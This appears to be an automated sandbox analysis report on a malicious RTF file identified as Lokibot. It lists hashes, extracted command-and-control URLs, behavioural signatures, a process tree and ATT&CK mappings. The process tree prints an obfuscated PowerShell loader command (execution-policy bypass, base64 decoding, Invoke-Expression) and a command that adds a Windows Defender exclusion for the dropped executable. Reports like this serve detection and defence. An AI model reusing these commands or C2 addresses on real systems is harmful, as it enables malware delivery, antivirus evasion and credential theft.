Analysis
- max time kernel: 96s
- max time network: 97s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64 arch:x86 image:win7-20240729-en locale:en-us os:windows7-x64 system
- submitted: 20-11-2024 10:07
Static task
static1
Behavioral task
behavioral1
Sample
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
Resource
win10v2004-20241007-en
General
-
Target
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
-
Size
251KB
-
MD5
e6859034a42f217800b6bf0980e93848
-
SHA1
8dcb69dcf727b7a7fbfbf6755492990dc51fd192
-
SHA256
564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
-
SHA512
778ceefc76571268a7c82c18ec1b6f6661b4f696d2612528b8eb94488383c84c9dba6613cd5b1c715514e64d062d73d28d84395f30dadb4fd2da51cbac372d35
-
SSDEEP
3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 2 IoCs
- flow 3: PID 2804, EQNEDT32.EXE
- flow 6: PID 2792, poWERShell.eXe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
- PID 2272, powershell.exe
Downloads MZ/PE file
Evasion via Device Credential Deployment 2 IoCs
- PID 668, powershell.exe
- PID 2792, poWERShell.eXe
Executes dropped EXE 3 IoCs
- PID 2680, wininit.exe
- PID 2216, wininit.exe
- PID 2316, wininit.exe
Loads dropped DLL 3 IoCs
- PID 2792, poWERShell.eXe
- PID 2792, poWERShell.eXe
- PID 2792, poWERShell.eXe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
- Key opened: \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (wininit.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (wininit.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (wininit.exe)
Drops file in System32 directory 3 IoCs
- File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
- File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
- File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (poWERShell.eXe)
Suspicious use of SetThreadContext 1 IoCs
- PID 2680 set thread context of 2316: PID 2680, wininit.exe, procid_target 43
Drops file in Windows directory 1 IoCs
- File opened for modification: C:\Windows\Debug\WIA\wiatrace.log (WINWORD.EXE)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (mshta.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (WINWORD.EXE)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (EQNEDT32.EXE)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (csc.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cvtres.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (wininit.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (poWERShell.eXe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
- PID 2804, EQNEDT32.EXE
Modifies Internet Explorer settings
- Key created: \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
Suspicious behavior: AddClipboardFormatListener 1 IoCs
- PID 2324, WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs
- PID 2792, poWERShell.eXe
- PID 668, powershell.exe
- PID 2680, wininit.exe
- PID 2680, wininit.exe
- PID 2272, powershell.exe
Suspicious use of AdjustPrivilegeToken 5 IoCs
- Token: SeDebugPrivilege, PID 2792, poWERShell.eXe
- Token: SeDebugPrivilege, PID 668, powershell.exe
- Token: SeDebugPrivilege, PID 2680, wininit.exe
- Token: SeDebugPrivilege, PID 2272, powershell.exe
- Token: SeDebugPrivilege, PID 2316, wininit.exe
Suspicious use of SetWindowsHookEx 2 IoCs
- PID 2324, WINWORD.EXE
- PID 2324, WINWORD.EXE
Suspicious use of WriteProcessMemory 46 IoCs
outlook_office_path 1 IoCs
- Key opened: \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (wininit.exe)
outlook_win_path 1 IoCs
- Key opened: \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (wininit.exe)
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2172
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'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'+[CHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt4⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\curq-f5c.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4442.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4441.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2384
-
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Executes dropped EXE
PID:2216
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2316
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Exploitation for Client Execution (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms